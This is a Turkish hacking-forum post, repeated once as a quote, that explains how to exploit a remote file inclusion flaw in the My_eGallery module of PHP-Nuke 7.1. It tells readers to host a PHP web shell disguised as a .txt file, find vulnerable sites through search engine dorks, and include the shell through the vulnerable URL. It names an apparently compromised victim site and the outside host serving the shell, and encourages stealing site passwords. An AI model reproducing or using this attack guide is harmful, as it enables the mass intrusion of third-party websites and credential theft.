hacker_by_bait
Banned
- Katılım
- 31 Ağu 2005
- Mesajlar
- 46
- Reaction score
- 0
- Puanları
- 0
php nuke 7.1 bug
/modules/My_eGallery/public/displayCategory.php?
my_egallry modulu bulunan nukelerde bulunan bu açığı nasıl değerlendiririz?
gayet basit
listpath ımızı beleş bir siteye veya herhangi bir siteye php uzantısını .txt olarak değiştirerek upload ediyorsunuz.
ben upload ettim bir siteye adam uyanana kadar kullanabilirsiniz. Gerekirse bir çok siteye upload edilebilir sorun değil daha sonra Google veya diğer arama motarlarında "/modules/My_eGallery/public/displayCategory.php" şeklinde aratıyoruz çok daha değişik şekillerde de aratabilirsiniz önümüze bir sürü site geliyor ve aşağıdaki kodu url nin sonuna yapıştırıp açık varsa listpath ekranda
http://www.target.com/modules/My_eG...http://www.b2b-business-directory.com/kk.txt?
evet tüm domainin içindesiniz bir bakmışsınız 10 bin php site var içerde:
ÖRNET
bu açıktan yararlanılarak atılmıştır
http://www.3ntidee.it/modules/My_eG...http://www.b2b-business-directory.com/kk.txt?
evet görüldüğü üzere ekranda daha sonra bu listpath ı beğenmedim remviev attım oda burda
örnek olarak verilmiştir bazılarında perm yok zarar vermemek daha iyi olur düşüncesindeyim içinde bayağı bir site var çünkü
cms de edit bulunmuş editten yeni bir lispath atılmıştır
http://www.3ntidee.it/cms/config.php
edit yazan bölümlere istediğinizi yapabilirsiniz sitenin şifrelerini çalabilirsiniz permission yoksa direk upload yapabilirsiniz gerisi sizin yeteneklerinize kalmış
daha değişik listpath larda atabilirsiniz
şimdilik bu kadar sorularınız olursa yanıtlamaya çalışırım
kolay gelsin.
alıntı
/modules/My_eGallery/public/displayCategory.php?
my_egallry modulu bulunan nukelerde bulunan bu açığı nasıl değerlendiririz?
gayet basit
listpath ımızı beleş bir siteye veya herhangi bir siteye php uzantısını .txt olarak değiştirerek upload ediyorsunuz.
ben upload ettim bir siteye adam uyanana kadar kullanabilirsiniz. Gerekirse bir çok siteye upload edilebilir sorun değil daha sonra Google veya diğer arama motarlarında "/modules/My_eGallery/public/displayCategory.php" şeklinde aratıyoruz çok daha değişik şekillerde de aratabilirsiniz önümüze bir sürü site geliyor ve aşağıdaki kodu url nin sonuna yapıştırıp açık varsa listpath ekranda
http://www.target.com/modules/My_eG...http://www.b2b-business-directory.com/kk.txt?
evet tüm domainin içindesiniz bir bakmışsınız 10 bin php site var içerde:
ÖRNET
bu açıktan yararlanılarak atılmıştır
http://www.3ntidee.it/modules/My_eG...http://www.b2b-business-directory.com/kk.txt?
evet görüldüğü üzere ekranda daha sonra bu listpath ı beğenmedim remviev attım oda burda
örnek olarak verilmiştir bazılarında perm yok zarar vermemek daha iyi olur düşüncesindeyim içinde bayağı bir site var çünkü
cms de edit bulunmuş editten yeni bir lispath atılmıştır
http://www.3ntidee.it/cms/config.php
edit yazan bölümlere istediğinizi yapabilirsiniz sitenin şifrelerini çalabilirsiniz permission yoksa direk upload yapabilirsiniz gerisi sizin yeteneklerinize kalmış
daha değişik listpath larda atabilirsiniz
şimdilik bu kadar sorularınız olursa yanıtlamaya çalışırım
kolay gelsin.
alıntı